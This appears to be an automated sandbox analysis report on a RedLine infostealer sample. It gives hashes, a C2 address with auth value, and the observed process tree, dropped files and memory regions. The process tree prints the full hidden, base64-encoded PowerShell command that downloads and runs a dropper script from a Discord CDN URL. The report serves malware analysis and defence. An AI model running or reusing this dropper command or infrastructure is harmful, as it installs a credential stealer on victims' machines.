redline | 03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50

General

Target

tmp.exe
Size

92KB
MD5

f0b2f2d5186ecb1df278892375e29171
SHA1

f1e2e1365ad3463a5685bd6ab8eeb581f50dd0ee
SHA256

03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50
SHA512

41fa116f39afd6f4e7fc7bad821c0ce9fe0db268dab18a9e83db6ec3fe6c83099bf14f80441f0bf87a4d5590782a1ba9908d6c576d8c56e224a8c096aae07c0d
SSDEEP

1536:EjpxRYrm0MlPJFZyMzJdNHJGQ/l3pS+2ZyxDG/ONJctGVaIsWkBcd5ApB:EjF0M9bldNrpS+2ZyxDG//UVb58B

Score

10^/10

redline @pepsiiiks infostealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/1089906964944920650/1090020680885600276/6456234.ps1

Extracted

Family

redline

Botnet

@pepsiiiks

C2

37.220.87.13:48790

Attributes

auth_value
fe64d38aa6dcc1910323ccf891188b46

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 3824 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3824 set thread context of 2232 3824 powershell.exe AppLaunch.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeAppLaunch.exe

pid process

3824 powershell.exe
3824 powershell.exe
2232 AppLaunch.exe
2232 AppLaunch.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeAppLaunch.exe

description pid process

Token: SeDebugPrivilege 3824 powershell.exe
Token: SeDebugPrivilege 2232 AppLaunch.exe

flow	pid	process
17	3824	powershell.exe

description	pid	process	target process
PID 3824 set thread context of 2232	3824	powershell.exe	AppLaunch.exe

pid	process
3824	powershell.exe
3824	powershell.exe
2232	AppLaunch.exe
2232	AppLaunch.exe

description	pid	process
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	2232	AppLaunch.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

tmp.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 2548 wrote to memory of 3088	2548	tmp.exe	cmd.exe
PID 2548 wrote to memory of 3088	2548	tmp.exe	cmd.exe
PID 2548 wrote to memory of 3088	2548	tmp.exe	cmd.exe
PID 3088 wrote to memory of 3824	3088	cmd.exe	powershell.exe
PID 3088 wrote to memory of 3824	3088	cmd.exe	powershell.exe
PID 3088 wrote to memory of 3824	3088	cmd.exe	powershell.exe
PID 3824 wrote to memory of 2588	3824	powershell.exe	csc.exe
PID 3824 wrote to memory of 2588	3824	powershell.exe	csc.exe
PID 3824 wrote to memory of 2588	3824	powershell.exe	csc.exe
PID 2588 wrote to memory of 2304	2588	csc.exe	cvtres.exe
PID 2588 wrote to memory of 2304	2588	csc.exe	cvtres.exe
PID 2588 wrote to memory of 2304	2588	csc.exe	cvtres.exe
PID 3824 wrote to memory of 4228	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 4228	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 4228	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe
PID 3824 wrote to memory of 2232	3824	powershell.exe	AppLaunch.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgAOQA5ADAANgA5ADYANAA5ADQANAA5ADIAMAA2ADUAMAAvADEAMAA5ADAAMAAyADAANgA4ADAAOAA4ADUANgAwADAAMgA3ADYALwA2ADQANQA2ADIAMwA0AC4AcABzADEAJwApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwAgAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADgAOQA5ADAANgA5ADYANAA5ADQANAA5ADIAMAA2ADUAMAAvADEAMAA5ADAAMAAyADAANgA4ADAAOAA4ADUANgAwADAAMgA3ADYALwA2ADQANQA2ADIAMwA0AC4AcABzADEAJwApAA==
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4k05uftd\4k05uftd.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3B7.tmp" "c:\Users\Admin\AppData\Local\Temp\4k05uftd\CSC65A4496E7ABA463BBDC2D9F64DEE474.TMP"
5⤵
PID:2304

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:4228

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4k05uftd\4k05uftd.dll
Filesize
3KB

MD5
a5ccae84cbbab702e72117e0492e812a

SHA1
5479486e8365519c5491651b250b38745415fb7f

SHA256
28ce3408950e60d4fbda9664bc8cbd37879fd33aaf3eee8fb9f55652f8fa81c1

SHA512
a9fc56d09468a779226d5eb35bbc5b9c83571a992043583ca86e019407ad58e5f2aad02575f392c0a4ea01cd63512a3f40cda21a22e3e38f7f85931a8a9104d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA3B7.tmp
Filesize
1KB

MD5
b5e00dac84328a629051f72976ec98d2

SHA1
74849c9257724d7c179018084a4d30f3b5ddd538

SHA256
241781d63957ed1dfa063bd07a62b0f2918a4f13b14e00e29eff9c10f8182dba

SHA512
9387081f3919eb493c2e6656312f2fd8368c8dfbcde47edb7f49c4d5426f12d00eaaded4529900ea7ea31d802559b0efabd92546db7753787cdeea79e6a3c61e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuma4jp0.aff.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4k05uftd\4k05uftd.0.cs
Filesize
449B

MD5
e8c41bf3708cc4bd505851f38966151a

SHA1
ab943b19fb2e837904c97a3c52309c1f2c20dc9c

SHA256
54dc97b3a24a8137d2b4dcb052b104ffde93bd4a89297ee2fb522fa346bb01e9

SHA512
40a0f9f82cfed1e51feeeda8f790b1bffb5dc7f878fd86fc8bb3fca9d5133383e3d801bdddc97907361712b9bef75062860ab2b9add12188737d8f0418cd4cc4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4k05uftd\4k05uftd.cmdline
Filesize
369B

MD5
f65cbe2c31a1ace25a3acdcf54382035

SHA1
5c39c92ead47fd54e702333de2aef6c6d917cfde

SHA256
79b0d037f62667e9cf8aa31b2e4164ac94a19a71949ef9747861393467834fe5

SHA512
e4b639a6c8a7369252107a21df51e122c1cf9ba2964e915a896e8acbce6542ac6723a9db01e791f121d50c3d125b60e45018024f9edc47dcade183b9696e2c70

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4k05uftd\CSC65A4496E7ABA463BBDC2D9F64DEE474.TMP
Filesize
652B

MD5
bc5eb22a0a80b176ef1028c7a4fe4d89

SHA1
b1aaf3d661f22ac64d2ee4d7577a14bf400f6c73

SHA256
659808773b41fb36d077dc94deadec6f614176bc9be0b1d2a6ec6c1546819f6b

SHA512
3208b46b7879e8181d850a269192e04405e2822cd6eda393735ba84c4adb77f505f2d226044677cea09cd334febbddb1d310e889d921cb9adf0bf20b25d99f7f

Download Submit
memory/2232-200-0x00000000072C0000-0x0000000007482000-memory.dmp

Filesize
1.8MB

Download
memory/2232-196-0x0000000006D10000-0x00000000072B4000-memory.dmp

Filesize
5.6MB

Download
memory/2232-195-0x00000000066C0000-0x0000000006752000-memory.dmp

Filesize
584KB

Download
memory/2232-188-0x00000000057C0000-0x00000000057D0000-memory.dmp

Filesize
64KB

Download
memory/2232-175-0x00000000057D0000-0x000000000580C000-memory.dmp

Filesize
240KB

Download
memory/2232-173-0x0000000005860000-0x000000000596A000-memory.dmp

Filesize
1.0MB

Download
memory/2232-199-0x0000000006940000-0x00000000069B6000-memory.dmp

Filesize
472KB

Download
memory/2232-169-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/2232-201-0x00000000079C0000-0x0000000007EEC000-memory.dmp

Filesize
5.2MB

Download
memory/2232-202-0x0000000006A40000-0x0000000006A5E000-memory.dmp

Filesize
120KB

Download
memory/2232-203-0x0000000006BA0000-0x0000000006BF0000-memory.dmp

Filesize
320KB

Download
memory/2232-171-0x0000000005730000-0x0000000005742000-memory.dmp

Filesize
72KB

Download
memory/2232-170-0x0000000005D00000-0x0000000006318000-memory.dmp

Filesize
6.1MB

Download
memory/3824-152-0x0000000005F90000-0x0000000005FAA000-memory.dmp

Filesize
104KB

Download
memory/3824-190-0x00000000071A0000-0x00000000071AA000-memory.dmp

Filesize
40KB

Download
memory/3824-167-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-166-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-172-0x0000000007100000-0x0000000007132000-memory.dmp

Filesize
200KB

Download
memory/3824-133-0x00000000044B0000-0x00000000044E6000-memory.dmp

Filesize
216KB

Download
memory/3824-174-0x0000000070690000-0x00000000706DC000-memory.dmp

Filesize
304KB

Download
memory/3824-151-0x00000000071C0000-0x000000000783A000-memory.dmp

Filesize
6.5MB

Download
memory/3824-176-0x00000000060A0000-0x00000000060A1000-memory.dmp

Filesize
4KB

Download
memory/3824-178-0x000000007F970000-0x000000007F980000-memory.dmp

Filesize
64KB

Download
memory/3824-189-0x00000000070E0000-0x00000000070FE000-memory.dmp

Filesize
120KB

Download
memory/3824-150-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-177-0x0000000070820000-0x0000000070B74000-memory.dmp

Filesize
3.3MB

Download
memory/3824-168-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-191-0x000000000B9B0000-0x000000000BA46000-memory.dmp

Filesize
600KB

Download
memory/3824-192-0x000000000B930000-0x000000000B93E000-memory.dmp

Filesize
56KB

Download
memory/3824-193-0x000000000B990000-0x000000000B9AA000-memory.dmp

Filesize
104KB

Download
memory/3824-194-0x000000000B980000-0x000000000B988000-memory.dmp

Filesize
32KB

Download
memory/3824-149-0x0000000005A90000-0x0000000005AAE000-memory.dmp

Filesize
120KB

Download
memory/3824-139-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/3824-138-0x0000000004B50000-0x0000000004BB6000-memory.dmp

Filesize
408KB

Download
memory/3824-137-0x0000000004AA0000-0x0000000004AC2000-memory.dmp

Filesize
136KB

Download
memory/3824-136-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-135-0x0000000004660000-0x0000000004670000-memory.dmp

Filesize
64KB

Download
memory/3824-134-0x0000000004CA0000-0x00000000052C8000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads